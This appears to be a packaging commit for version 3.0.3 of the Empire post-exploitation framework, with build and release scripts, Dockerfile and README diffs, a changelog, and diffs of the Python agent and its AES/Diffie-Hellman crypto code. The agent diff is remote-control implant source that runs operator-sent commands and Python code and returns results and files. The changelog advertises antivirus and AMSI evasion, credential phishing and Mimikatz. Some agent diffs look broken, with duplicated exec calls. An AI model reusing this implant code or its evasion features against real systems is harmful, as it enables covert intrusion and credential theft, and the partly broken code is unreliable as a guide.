New upstream version 3.0.3
Sophie Brun
4 years ago
#!/usr/bin/env bash
# Build the Empire Docker image and tag it :latest.
# Requires: curl, docker.
set -ex

# SET THE FOLLOWING VARIABLES
# docker hub username
USERNAME=empireproject
# image name
IMAGE=empire
# version — scraped from the upstream source ('VERSION = "x.y.z"' in empire.py).
# curl -f: fail on HTTP errors instead of silently yielding an empty body,
# which would previously bake an empty empireversion build-arg into the image.
VERSION="$(curl -fsS https://raw.githubusercontent.com/EmpireProject/Empire/master/lib/common/empire.py \
  | grep "VERSION =" | cut -d '"' -f2)"

# Abort loudly if the scrape produced nothing (page layout changed, network issue).
if [[ -z "$VERSION" ]]; then
  echo "error: could not determine upstream Empire version" >&2
  exit 1
fi

docker build --build-arg empireversion="$VERSION" -t "$USERNAME/$IMAGE:latest" .
#!/usr/bin/env bash
# Interactive release helper: optionally bump the version, cut a GitHub
# release, build the Docker image, and push it to Docker Hub.
# Requires the following packages: git, hub, docker
set -ex

# SET THE FOLLOWING VARIABLES
USERNAME=empireproject
IMAGE=empire
VERSION="$(cat VERSION)"

# Ask a yes/no question; succeeds (returns 0) only on y/Y.
# -r keeps backslashes literal; -n 1 reads a single keypress.
confirm() {
  local reply
  read -r -n 1 -p "$1 [Y/N] " reply
  echo # move to a new line after the single-key read
  [[ $reply =~ ^[Yy]$ ]]
}

# UPDATE THE SOURCE CODE
git pull

# bump version
# TODO: CHECK IF WE WANT TO BUMP PATCH or MINOR or MAJOR
if confirm "[!] Do you want to BUMP the version?"; then
  docker run --rm -v "$PWD":/app treeder/bump minor
fi
# Re-read: the bump container rewrote the VERSION file.
VERSION="$(cat VERSION)"
echo "[*] Current version: $VERSION"

# TAG, PULL, MERGE DEV
if confirm "[!] Do you want to create a new Github Release?"; then
  git checkout -b "Version-$VERSION"
  git add --all
  git commit -m "Empire $VERSION Release"
  # NO NEED TO TAG IF WE RELEASE
  # git tag -a "$VERSION" -m "Empire $VERSION Release"
  git push origin "Version-$VERSION"
  # git push origin "dev" --tags
  git checkout master
  git merge "Version-$VERSION"
  git push
  hub release create "$VERSION" -m "Empire $VERSION Release"
fi

if confirm "[!] Do you want to BUILD Docker image?"; then
  # ALERT VERSION
  echo "[*] Building Version: $VERSION"
  # START BUILD
  ./.build.sh
fi

# DOCKER TAG/VERSIONING
docker tag "$USERNAME/$IMAGE:latest" "$USERNAME/$IMAGE:$VERSION"

if confirm "[!] Do you want to PUSH to Docker Hub?"; then
  # PUSH TO DOCKER HUB
  docker push "$USERNAME/$IMAGE:latest"
  echo "Docker image pushed: $USERNAME/$IMAGE:latest"
  docker push "$USERNAME/$IMAGE:$VERSION"
  echo "Docker image pushed: $USERNAME/$IMAGE:$VERSION"
fi
25 | 25 | # set the def shell for ENV |
26 | 26 | SHELL ["/bin/bash", "-c"] |
27 | 27 | |
28 | COPY . /empire | |
29 | ||
30 | 28 | RUN apt-get update && \ |
31 | 29 | apt-get -y install sudo && \ |
32 | 30 | apt-get -y install lsb-release |
31 | ||
32 | COPY . /empire | |
33 | 33 | |
34 | 34 | RUN cd /empire/setup/ && \ |
35 | 35 | ./install.sh && \ |
30 | 30 | Empire is developed by [@harmj0y](https://twitter.com/harmj0y), [@sixdub](https://twitter.com/sixdub), [@enigma0x3](https://twitter.com/enigma0x3), [@rvrsh3ll](https://twitter.com/424f424f), [@killswitch_gui](https://twitter.com/killswitch_gui), [@xorrior](https://twitter.com/xorrior), and [@bcsecurity1](https://twitter.com/BCSecurity1). While the main fork for Empire is no longer maintained, this fork is maintained by [BC-Security](https://www.bc-security.org) and will continue to receive periodic updates. |
31 | 31 | |
32 | 32 | ## Release Notes |
33 | With the release of the 3.0 beta, there are some major upgrades to Empire. Many of these have lingered on various branches of the Empire project and have finally been consolidated, as well as, there being several new updates. The biggest change to mention is the conversion of the Empire base code from Python 2.7 to Python 2.7/3.x compatible. This will ensure that Empire continues to function as Kali drops Python 2.7 support. The conversion also causes some issues in the way that bytes and strings are handled which will likely cause some unfound errors. | |
33 | There are some major upgrades in Empire 3.0. Many of these have lingered on various branches of the Empire project and have finally been consolidated, as well as, there being several new updates. The biggest change to mention is the conversion of the Empire base code from Python 2.7 to Python 2.7/3.x compatible. This will ensure that Empire continues to function as Kali drops Python 2.7 support. The conversion also causes some issues in the way that bytes and strings are handled which will likely cause some unfound errors. | |
34 | 34 | |
35 | We have tested the core http listeners (http, http_hop, http_mapi, redirector) and confirmed that they work in both Python 2.7 and 3.x. We have also tested the Mimikatz modules and several of the launchers. There are still many modules that need to be tested, hence the beta release. | |
35 | We have tested the core http listeners (http, http_hop, http_mapi, redirector) and confirmed that they work in both Python 2.7 and 3.x. We have also tested the Mimikatz modules and several of the launchers. | |
36 | 36 | |
37 | 37 | In addition to the code conversion, there are some minor UI updates, a few new modules, and new functionality. The full list of changes can be reviewed in the changelog. |
38 | 38 | |
60 | 60 | docker run -it --volumes-from data bcsecurity/empire:{version} |
61 | 61 | |
62 | 62 | # if you prefer to be dropped into bash instead of directly into empire |
63 | # or docker run -it --volumes-from data bcsecurity/empire:{version} /bin/bash | |
63 | # docker run -it --volumes-from data bcsecurity/empire:{version} /bin/bash | |
64 | 64 | ``` |
65 | 65 | |
66 | 66 | All image versions can be found at: https://hub.docker.com/r/bcsecurity/empire/ |
67 | 67 | * The last commit from master will be deployed to the `latest` tag |
68 | 68 | * The last commit from the dev branch will be deployed to the `dev` tag |
69 | * All github tagged releases will be deployed using their version numbers (v3.0, v3.1, etc) | |
69 | * All github tagged releases will be deployed using their version numbers (v3.0.0, v3.1.0, etc) | |
70 | 70 | |
71 | 71 | ## Quickstart |
72 | 72 |
0 | 11/26/2019 | |
0 | 1/13/2020 | |
1 | 1 | ------------ |
2 | - Version 3.0 Beta Release | |
2 | - Version 3.0.3 Master Release | |
3 | - Updated RESTful API to Python 3 - #49 (@Cx01N) | |
4 | - Fixed credential issue - #65 (@Hubbl3) | |
5 | - Fixed python agent - #52 (@Cx01N, @Hubbl3) | |
6 | - Cleaned up install files - #58 (@Vinnybod) | |
7 | ||
8 | 1/7/2020 | |
9 | ------------ | |
10 | - Version 3.0.2 Master Release | |
11 | - Updated SystemRandom() and maintain API compatibility - #29 (@moloch--) | |
12 | - Fixed invoke-shell code (@Hubbl3) | |
13 | - Fixed meterpreter stager generation - #59 (@Hubbl3) | |
14 | - Fixed lnk and dll launchers - #57 (@Cx01N) | |
15 | - Fixed multi/macro launcher - #60 (@Hubbl3) | |
16 | - Updated orphaned agent handling - #56 (@Hubbl3) | |
17 | - Fixed pip3 install - #50 (@Hubbl3) | |
18 | - Removed unsupported invoke-shellcode options (@Hubbl3) | |
19 | ||
20 | 12/29/2019 | |
21 | ------------ | |
22 | - Version 3.0.1 Master Release | |
23 | - Fixed sysinfo error - #36 (@Invoke-Mimikatz) | |
24 | - Fixed Debian 10.x docker - #38 (@Vinnybod) | |
25 | - Fixed windows/macro stager error - #30 (@Cx01N) | |
26 | - Fixed upload file error - #30 (@Cx01N) | |
27 | - Fixed meterpreter error - #42 (@Cx01N) | |
28 | - Fixed download file error (@Cx01N) | |
29 | - Fixed scriptcmd error - #45 (@Invoke-Mimikatz) | |
30 | - Fixed print creds error - #31 (@Hubbl3) | |
31 | - Cleaned up print results (@Cx01N) | |
32 | - Fixed long running module issue - #16 (@Hubbl3) | |
33 | ||
34 | Thank you to the contributors for spending time debugging with our team. | |
35 | Please contact us at [email protected] if credit is incorrectly cited. | |
36 | ||
37 | 12/22/2019 | |
38 | ------------ | |
39 | - Version 3.0 Master Release | |
3 | 40 | - Added Python 2.6/7 and 3.x compatibility (@Cx01N, @Hubbl3, @Vinnybod) |
4 | - Improved Windows Defender Evasion | |
41 | - Improved Windows Defender Evasion (@Hubbl3) | |
5 | 42 | - Updated mimikatz binary in Invoke-Mimikatz to version 2.2.0 20191125 (@Cx01N) |
6 | 43 | - Fixed port assignment feature to listeners (@Cx01N) |
7 | 44 | - Fixed issues with http_Hop listener (@Cx01N) |
16 | 53 | - Added Get-KerberosServiceTIcket (@OneLogicalMyth) |
17 | 54 | - Added Invoke-RID_Hijack (@r4wd3r) |
18 | 55 | - Added Invoke-internal_monologue (@audibleblink) |
19 | - Added Get-LAPSPasswords (@audibleblink) | |
56 | - Added Get-LAPSPasswords (@ippsec) | |
20 | 57 | - Added Invoke-SMBLogin (@mvelazc0) |
21 | - Added Sherlock (@_RastaMouse, @audibleblink) | |
58 | - Added Sherlock (@ippsec) | |
22 | 59 | - Added Outlook Sandbox Evasion for Windows Macro launcher (@Cx01N, @Hubbl3) |
23 | - Added Randomized JA3S signature (@Hubbl3) | |
60 | - Added Randomized JA3/S signature (@Hubbl3) | |
24 | 61 | - Added AMSI Bypass based on Tal Liberman's AMSI Bypass (@Hubbl3) |
25 | 62 | - Added Invoke-CredentialPhisher (@quickbreach) |
26 | 63 | - Made Security Bypasses configurable for launchers (@phra) |
27 | - Updated Readme to include install instruction, EOL of Core Devloper support, new contribution rules | |
64 | - Updated Readme to include install instruction, EOL of Core Developer support, new contribution rules (@Hubbl3) | |
28 | 65 | - Added OSX shellcode stager (@johneiser) |
29 | 66 | - Added Invoke-Phant0m (@leesoh) |
30 | 67 | - Added Get-AppLockerConfig (@matterpreter) |
65 | 102 | - Added onedrive listener for powershell agent (@mr64bit) |
66 | 103 | - Added opsec-safe aliases for ls, pwd, rm, mkdir, whoami, and getuid in the python agent |
67 | 104 | - Updated office macro stager for python agent (@import-au) |
68 | ||
69 | ||
70 | 105 | |
71 | 106 | 01/04/2018 |
72 | 107 | ------------ |
440 | 440 | param($JobName) |
441 | 441 | if($Script:Jobs.ContainsKey($JobName)) { |
442 | 442 | $Script:Jobs[$JobName]['Buffer'].ReadAll() |
443 | $Script:Jobs[$JobName]['PSHost'].Streams.Error | |
444 | $Script:Jobs[$JobName]['PSHost'].Streams.Error.Clear() | |
445 | 443 | } |
446 | 444 | } |
447 | 445 | |
454 | 452 | $Null = $Script:Jobs[$JobName]['PSHost'].Stop() |
455 | 453 | # get results |
456 | 454 | $Script:Jobs[$JobName]['Buffer'].ReadAll() |
457 | $Script:Jobs[$JobName]['PSHost'].Streams.Error | |
458 | $Script:Jobs[$JobName]['PSHost'].Streams.Error.Clear() | |
459 | 455 | # unload the app domain runner |
460 | 456 | $Null = [AppDomain]::Unload($Script:Jobs[$JobName]['AppDomain']) |
461 | 457 | $Script:Jobs.Remove($JobName) |
0 | from __future__ import print_function | |
1 | 0 | from __future__ import division |
2 | 1 | from future import standard_library |
3 | 2 | standard_library.install_aliases() |
149 | 148 | totalPacket = struct.pack('=H', 1) |
150 | 149 | packetNum = struct.pack('=H', 1) |
151 | 150 | resultID = struct.pack('=H', resultID) |
152 | ||
151 | ||
153 | 152 | if packetData: |
154 | packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8','ignore')) | |
153 | if(isinstance(packetData, str)): | |
154 | packetData = base64.b64encode(packetData.encode('utf-8', 'ignore')) | |
155 | else: | |
156 | packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8','ignore')) | |
155 | 157 | if len(packetData) % 4: |
156 | 158 | packetData += '=' * (4 - len(packetData) % 4) |
157 | ||
159 | ||
158 | 160 | length = struct.pack('=L',len(packetData)) |
159 | 161 | return packetType + totalPacket + packetNum + resultID + length + packetData |
160 | 162 | else: |
185 | 187 | """ |
186 | 188 | |
187 | 189 | # print "parse_task_packet" |
190 | ||
191 | if(isinstance(packet, str)): | |
192 | packet = packet.encode('UTF-8') | |
188 | 193 | |
189 | 194 | try: |
190 | 195 | packetType = struct.unpack('=H', packet[0+offset:2+offset])[0] |
194 | 199 | length = struct.unpack('=L', packet[8+offset:12+offset])[0] |
195 | 200 | packetData = packet[12+offset:12+offset+length] |
196 | 201 | remainingData = packet[12+offset+length:] |
197 | return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData) | |
202 | ||
203 | return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData) | |
198 | 204 | except Exception as e: |
199 | # print "parse_task_packet exception:",e | |
205 | print "parse_task_packet exception:",e | |
200 | 206 | return (None, None, None, None, None, None, None) |
201 | 207 | |
202 | 208 | |
204 | 210 | # processes an encrypted data packet |
205 | 211 | # -decrypts/verifies the response to get |
206 | 212 | # -extracts the packets and processes each |
207 | ||
208 | 213 | try: |
209 | 214 | # aes_decrypt_and_verify is in stager.py |
210 | 215 | tasking = aes_decrypt_and_verify(key, data) |
221 | 226 | resultPackets += result |
222 | 227 | |
223 | 228 | packetOffset = 12 + length |
224 | ||
225 | 229 | while remainingData and remainingData != '': |
226 | 230 | (packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking, offset=packetOffset) |
227 | 231 | result = process_packet(packetType, data, resultID) |
255 | 259 | |
256 | 260 | def process_packet(packetType, data, resultID): |
257 | 261 | |
262 | if(isinstance(data, bytes)): | |
263 | data = data.decode('UTF-8') | |
258 | 264 | try: |
259 | 265 | packetType = int(packetType) |
260 | 266 | except Exception as e: |
261 | 267 | return None |
262 | ||
263 | 268 | if packetType == 1: |
264 | 269 | # sysinfo request |
265 | 270 | # get_sysinfo should be exposed from stager.py |
266 | return build_response_packet(1, get_sysinfo(), resultID) | |
271 | send_message(build_response_packet(1, get_sysinfo(), resultID)) | |
267 | 272 | |
268 | 273 | elif packetType == 2: |
269 | 274 | # agent exit |
270 | ||
271 | 275 | send_message(build_response_packet(2, "", resultID)) |
272 | 276 | agent_exit() |
273 | 277 | |
274 | 278 | elif packetType == 40: |
275 | 279 | # run a command |
276 | 280 | parts = data.split(" ") |
277 | ||
278 | 281 | if len(parts) == 1: |
279 | 282 | data = parts[0] |
280 | 283 | resultData = str(run_command(data)) |
281 | return build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID) | |
284 | send_message(build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID)) | |
282 | 285 | else: |
283 | 286 | cmd = parts[0] |
284 | 287 | cmdargs = ' '.join(parts[1:len(parts)]) |
285 | 288 | resultData = str(run_command(cmd, cmdargs=cmdargs)) |
286 | return build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID) | |
289 | send_message(build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID)) | |
287 | 290 | |
288 | 291 | elif packetType == 41: |
289 | 292 | # file download |
290 | 293 | objPath = os.path.abspath(data) |
291 | 294 | fileList = [] |
292 | 295 | if not os.path.exists(objPath): |
293 | return build_response_packet(40, "file does not exist or cannot be accessed", resultID) | |
296 | send_message(build_response_packet(40, "file does not exist or cannot be accessed", resultID)) | |
294 | 297 | |
295 | 298 | if not os.path.isdir(objPath): |
296 | 299 | fileList.append(objPath) |
364 | 367 | msg = "Active jobs:\n" |
365 | 368 | for x in range(len(jobs)): |
366 | 369 | msg += "\t%s" %(x) |
367 | return build_response_packet(50, msg, resultID) | |
370 | send_message(build_response_packet(50, msg, resultID)) | |
368 | 371 | |
369 | 372 | elif packetType == 51: |
370 | 373 | # stop and remove a specified job if it's running |
389 | 392 | code_obj = compile(data, '<string>', 'exec') |
390 | 393 | exec(code_obj, globals()) |
391 | 394 | sys.stdout = sys.__stdout__ |
395 | code_obj = compile(data, '<string>', 'exec') | |
396 | exec(code_obj, globals()) | |
392 | 397 | results = buffer.getvalue() |
393 | return build_response_packet(100, str(results), resultID) | |
398 | send_message(build_response_packet(100, str(results), resultID)) | |
394 | 399 | except Exception as e: |
395 | errorData = str(buffer.getvalue()) | |
396 | return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" %(e, errorData), resultID) | |
400 | errorData = str(buffer.getvalue()) | |
401 | return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" %(e, errorData), resultID) | |
397 | 402 | |
398 | 403 | elif packetType == 101: |
399 | 404 | # dynamic code execution, wait for output, save output |
411 | 416 | comp_data = c.comp_data(buffer.getvalue()) |
412 | 417 | encodedPart = c.build_header(comp_data, start_crc32) |
413 | 418 | encodedPart = base64.b64encode(encodedPart) |
414 | return build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart, resultID) | |
419 | send_message(build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart, resultID)) | |
415 | 420 | except Exception as e: |
416 | 421 | # Also return partial code that has been executed |
417 | 422 | errorData = str(buffer.getvalue()) |
418 | return build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID) | |
423 | send_message(build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID)) | |
419 | 424 | |
420 | 425 | elif packetType == 102: |
421 | 426 | # on disk code execution for modules that require multiprocessing not supported by exec |
439 | 444 | fileCheck = os.path.isfile(implantPath) |
440 | 445 | if fileCheck: |
441 | 446 | result += "\n\nError removing module file, please verify path: " + str(implantPath) |
442 | return build_response_packet(100, str(result), resultID) | |
447 | send_message(build_response_packet(100, str(result), resultID)) | |
443 | 448 | except Exception as e: |
444 | 449 | fileCheck = os.path.isfile(implantPath) |
445 | 450 | if fileCheck: |
446 | return build_response_packet(0, "error executing specified Python data: %s \nError removing module file, please verify path: %s" %(e, implantPath), resultID) | |
447 | return build_response_packet(0, "error executing specified Python data: %s" %(e), resultID) | |
451 | send_message(build_response_packet(0, "error executing specified Python data: %s \nError removing module file, please verify path: %s" %(e, implantPath), resultID)) | |
452 | send_message(build_response_packet(0, "error executing specified Python data: %s" %(e), resultID)) | |
448 | 453 | |
449 | 454 | elif packetType == 110: |
450 | 455 | start_job(data) |
451 | return build_response_packet(110, "job %s started" %(len(jobs)-1), resultID) | |
456 | send(build_response_packet(110, "job %s started" %(len(jobs)-1), resultID)) | |
452 | 457 | |
453 | 458 | elif packetType == 111: |
454 | 459 | # TASK_CMD_JOB_SAVE |
465 | 470 | exec(code_obj, globals()) |
466 | 471 | sys.stdout = sys.__stdout__ |
467 | 472 | result = str(buffer.getvalue()) |
468 | return build_response_packet(121, result, resultID) | |
473 | send_message(build_response_packet(121, result, resultID)) | |
469 | 474 | except Exception as e: |
470 | 475 | errorData = str(buffer.getvalue()) |
471 | return build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID) | |
476 | send_message(build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID)) | |
472 | 477 | |
473 | 478 | elif packetType == 122: |
474 | 479 | #base64 decode and decompress the data |
523 | 528 | send_message(build_response_packet(124, "Unable to remove repo: %s, %s" % (repoName, str(e)), resultID)) |
524 | 529 | |
525 | 530 | else: |
526 | return build_response_packet(0, "invalid tasking ID: %s" %(taskingID), resultID) | |
531 | send_message(build_response_packet(0, "invalid tasking ID: %s" %(taskingID), resultID)) | |
527 | 532 | |
528 | 533 | |
529 | 534 | ################################################ |
540 | 545 | class ZipImportError(ImportError): |
541 | 546 | """Exception raised by zipimporter objects.""" |
542 | 547 | |
543 | # _get_info() = takes the fullname, then subpackage name (if applicable), | |
548 | # _get_info() = takes the fullname, then subpackage name (if applicable), | |
544 | 549 | # and searches for the respective module or package |
545 | 550 | |
546 | 551 | class CFinder(object): |
620 | 625 | submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname) |
621 | 626 | return compile(source, fullpath, 'exec') |
622 | 627 | |
623 | def install_hook(repoName): | |
624 | if repoName not in _meta_cache: | |
625 | finder = CFinder(repoName) | |
626 | _meta_cache[repoName] = finder | |
627 | sys.meta_path.append(finder) | |
628 | ||
629 | def remove_hook(repoName): | |
630 | if repoName in _meta_cache: | |
631 | finder = _meta_cache.pop(repoName) | |
632 | sys.meta_path.remove(finder) | |
628 | def install_hook(repoName): | |
629 | if repoName not in _meta_cache: | |
630 | finder = CFinder(repoName) | |
631 | _meta_cache[repoName] = finder | |
632 | sys.meta_path.append(finder) | |
633 | ||
634 | def remove_hook(repoName): | |
635 | if repoName in _meta_cache: | |
636 | finder = _meta_cache.pop(repoName) | |
637 | sys.meta_path.remove(finder) | |
633 | 638 | |
634 | 639 | ################################################ |
635 | 640 | # |
724 | 729 | |
725 | 730 | def agent_exit(): |
726 | 731 | # exit for proper job / thread cleanup |
732 | print('exiting agent') | |
727 | 733 | if len(jobs) > 0: |
734 | print('jobs still running') | |
728 | 735 | try: |
729 | 736 | for x in jobs: |
730 | 737 | jobs[int(x)].kill() |
942 | 949 | cmdargs = '.' |
943 | 950 | |
944 | 951 | return directory_listing(cmdargs) |
945 | ||
952 | if re.compile("cd").match(command): | |
953 | os.chdir(cmdargs) | |
954 | return str(os.getcwd()) | |
946 | 955 | elif re.compile("pwd").match(command): |
947 | 956 | return str(os.getcwd()) |
948 | 957 | elif re.compile("rm").match(command): |
1 | 1 | Implements AES in python as a jinja2 partial. |
2 | 2 | AES code from https://github.com/ricmoo/pyaes |
3 | 3 | """ |
4 | ||
5 | from builtins import bytes | |
6 | from builtins import chr | |
7 | from builtins import zip | |
8 | from builtins import str | |
9 | from builtins import range | |
10 | from builtins import object | |
11 | 4 | import copy |
12 | 5 | import struct |
13 | 6 | import hashlib |
14 | 7 | import random |
15 | 8 | import hmac |
16 | ||
17 | ||
18 | def _concat_list(a, b): | |
19 | return a + b | |
9 | import os | |
20 | 10 | |
21 | 11 | def to_bufferable(binary): |
22 | 12 | return binary |
30 | 20 | def _string_to_bytes(text): |
31 | 21 | return list(ord(c) for c in text) |
32 | 22 | |
33 | def _compact_word(word): | |
34 | return (word[0] << 24) | (word[1] << 16) | (word[2] << 8) | word[3] | |
35 | ||
36 | # Python 3 compatibility | |
37 | try: | |
38 | xrange | |
39 | except Exception: | |
40 | xrange = range | |
41 | ||
42 | # Python 3 supports bytes, which is already an array of integers | |
43 | def _string_to_bytes(text): | |
44 | if isinstance(text, bytes): | |
45 | return text | |
46 | return [ord(c) for c in text] | |
47 | ||
48 | # In Python 3, we return bytes | |
49 | def _bytes_to_string(binary): | |
50 | return bytes(binary) | |
51 | ||
52 | # Python 3 cannot concatenate a list onto a bytes, so we bytes-ify it first | |
53 | def _concat_list(a, b): | |
54 | return a + bytes(b) | |
55 | ||
56 | def to_bufferable(binary): | |
57 | if isinstance(binary, bytes): | |
58 | return binary | |
59 | return bytes(ord(b) for b in binary) | |
60 | ||
61 | def _get_byte(c): | |
62 | return c | |
63 | 23 | |
64 | 24 | def append_PKCS7_padding(data): |
65 | 25 | pad = 16 - (len(data) % 16) |
66 | return data + to_bufferable(chr(pad) * pad) | |
26 | return data + to_bufferable(chr(pad).encode('UTF-8') * pad) | |
67 | 27 | |
68 | 28 | def strip_PKCS7_padding(data): |
69 | 29 | if len(data) % 16 != 0: |
71 | 31 | |
72 | 32 | pad = _get_byte(data[-1]) |
73 | 33 | return data[:-pad] |
34 | ||
35 | def _compact_word(word): | |
36 | return (word[0] << 24) | (word[1] << 16) | (word[2] << 8) | word[3] | |
37 | ||
74 | 38 | |
75 | 39 | class AES(object): |
76 | 40 | '''Encapsulates the AES block cipher. |
246 | 210 | |
247 | 211 | return result |
248 | 212 | |
249 | ||
250 | def decrypt(self, ciphertext): | |
251 | ||
252 | if len(ciphertext) != 16: | |
253 | raise ValueError('wrong block length') | |
254 | ||
255 | rounds = len(self._Kd) - 1 | |
256 | (s1, s2, s3) = [3, 2, 1] | |
257 | a = [0, 0, 0, 0] | |
258 | ||
259 | # Convert ciphertext to (ints ^ key) | |
260 | t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in range(0, 4)] | |
261 | ||
262 | # Apply round transforms | |
263 | for r in range(1, rounds): | |
264 | for i in range(0, 4): | |
265 | a[i] = (self.T5[(t[ i ] >> 24) & 0xFF] ^ | |
266 | self.T6[(t[(i + s1) % 4] >> 16) & 0xFF] ^ | |
267 | self.T7[(t[(i + s2) % 4] >> 8) & 0xFF] ^ | |
268 | self.T8[ t[(i + s3) % 4] & 0xFF] ^ | |
269 | self._Kd[r][i]) | |
270 | t = copy.copy(a) | |
271 | ||
272 | # The last round is special | |
273 | result = [ ] | |
274 | for i in range(0, 4): | |
275 | tt = self._Kd[rounds][i] | |
276 | result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF) | |
277 | result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF) | |
278 | result.append((self.Si[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF) | |
279 | result.append((self.Si[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF) | |
280 | ||
281 | return result | |
282 | ||
283 | 213 | class AESBlockModeOfOperation(object): |
284 | 214 | '''Super-class for AES modes of operation that require blocks.''' |
285 | 215 | def __init__(self, key): |
302 | 232 | elif len(iv) != 16: |
303 | 233 | raise ValueError('initialization vector must be 16 bytes') |
304 | 234 | else: |
305 | self._last_cipherblock = _string_to_bytes(iv) | |
235 | if isinstance(iv, str): | |
236 | self._last_cipherblock = _string_to_bytes(iv) | |
237 | self._last_cipherblock = iv | |
306 | 238 | |
307 | 239 | AESBlockModeOfOperation.__init__(self, key) |
308 | 240 | |
310 | 242 | if len(plaintext) != 16: |
311 | 243 | raise ValueError('plaintext block must be 16 bytes') |
312 | 244 | |
313 | plaintext = _string_to_bytes(plaintext) | |
245 | plaintext = plaintext | |
314 | 246 | precipherblock = [(p ^ l) for (p, l) in zip(plaintext, self._last_cipherblock)] |
315 | 247 | self._last_cipherblock = self._aes.encrypt(precipherblock) |
316 | 248 | |
320 | 252 | if len(ciphertext) != 16: |
321 | 253 | raise ValueError('ciphertext block must be 16 bytes') |
322 | 254 | |
323 | cipherblock = _string_to_bytes(ciphertext) | |
255 | cipherblock = ciphertext | |
324 | 256 | plaintext = [(p ^ l) for (p, l) in zip(self._aes.decrypt(cipherblock), self._last_cipherblock)] |
325 | 257 | self._last_cipherblock = cipherblock |
326 | 258 | |
329 | 261 | |
330 | 262 | def CBCenc(aesObj, plaintext, base64=False): |
331 | 263 | |
332 | # First we padd the plaintext | |
264 | # First we pad the plaintext | |
333 | 265 | paddedPlaintext = append_PKCS7_padding(plaintext) |
334 | 266 | |
335 | 267 | # The we break the padded plaintext in 16 byte chunks |
336 | 268 | blocks = [paddedPlaintext[0+i:16+i] for i in range(0, len(paddedPlaintext), 16)] |
337 | 269 | |
338 | 270 | # Finally we encypt each block |
339 | ciphertext = "" | |
271 | #ciphertext = "" | |
272 | ciphertext = ("") | |
340 | 273 | for block in blocks: |
341 | ciphertext += aesObj.encrypt(block) | |
342 | ||
274 | ciphertext = "".join([ciphertext, aesObj.encrypt(block)]) | |
275 | #ciphertext += aesObj.encrypt(block) | |
276 | ciphertext = ciphertext.encode('latin-1') | |
343 | 277 | return ciphertext |
344 | 278 | |
345 | 279 | |
360 | 294 | |
361 | 295 | |
362 | 296 | def getIV(len=16): |
363 | return ''.join(chr(random.randint(0, 255)) for _ in range(len)) | |
297 | rng = random.SystemRandom() | |
298 | return ''.join(chr(rng.randint(0, 255)) for _ in range(len)) | |
364 | 299 | |
365 | 300 | |
366 | 301 | def aes_encrypt(key, data): |
368 | 303 | Generate a random IV and new AES cipher object with the given |
369 | 304 | key, and return IV + encryptedData. |
370 | 305 | """ |
371 | IV = getIV() | |
306 | if isinstance(data, str): | |
307 | data = data.encode('UTF-8') | |
308 | if isinstance(key, str): | |
309 | key = key.encode('UTF-8') | |
310 | IV = os.urandom(16) | |
372 | 311 | aes = AESModeOfOperationCBC(key, iv=IV) |
373 | return IV + CBCenc(aes, data) | |
374 | ||
312 | CBC = CBCenc(aes, data) | |
313 | if isinstance(CBC, str): | |
314 | CBC = CBC.encode('UTF-8') | |
315 | return IV + CBC | |
375 | 316 | |
376 | 317 | def aes_encrypt_then_hmac(key, data): |
377 | 318 | """ |
378 | 319 | Encrypt the data then calculate HMAC over the ciphertext. |
379 | 320 | """ |
321 | if isinstance(key, str): | |
322 | key = bytes(key, 'UTF-8') | |
323 | if isinstance(data, str): | |
324 | data = bytes(data, 'UTF-8') | |
325 | ||
380 | 326 | data = aes_encrypt(key, data) |
381 | mac = hmac.new(str(key), data, hashlib.sha256).digest() | |
327 | mac = hmac.new(key, data, hashlib.sha256).digest() | |
382 | 328 | return data + mac[0:10] |
383 | 329 | |
384 | 330 | |
396 | 342 | """ |
397 | 343 | Verify the HMAC supplied in the data with the given key. |
398 | 344 | """ |
345 | if isinstance(key, str): | |
346 | key = bytes(key, 'latin-1') | |
347 | ||
399 | 348 | if len(data) > 20: |
400 | 349 | mac = data[-10:] |
401 | 350 | data = data[:-10] |
402 | 351 | expected = hmac.new(key, data, hashlib.sha256).digest()[0:10] |
403 | 352 | # Double HMAC to prevent timing attacks. hmac.compare_digest() is |
404 | 353 | # preferable, but only available since Python 2.7.7. |
405 | return hmac.new(str(key), expected).digest() == hmac.new(str(key), mac).digest() | |
354 | return hmac.new(key, expected).digest() == hmac.new(key, mac).digest() | |
406 | 355 | else: |
407 | 356 | return False |
408 | 357 | |
411 | 360 | """ |
412 | 361 | Decrypt the data, but only if it has a valid MAC. |
413 | 362 | """ |
363 | ||
414 | 364 | if len(data) > 32 and verify_hmac(key, data): |
365 | if isinstance(key, str): | |
366 | key = bytes(key, 'latin-1') | |
415 | 367 | return aes_decrypt(key, data[:-10]) |
416 | 368 | raise Exception("Invalid ciphertext received.") |
369 |
0 | 0 | """ Implements Diffie-Hellman as a Jinja2 partial for use in stagers |
1 | 1 | DH code from: https://github.com/lowazo/pyDHE """ |
2 | from __future__ import print_function | |
3 | ||
4 | from builtins import bytes | |
5 | from builtins import str | |
6 | from builtins import object | |
7 | 2 | import os |
8 | 3 | import hashlib |
9 | 4 |
54 | 54 | cmd = 'ps %s' % (os.getpid()) |
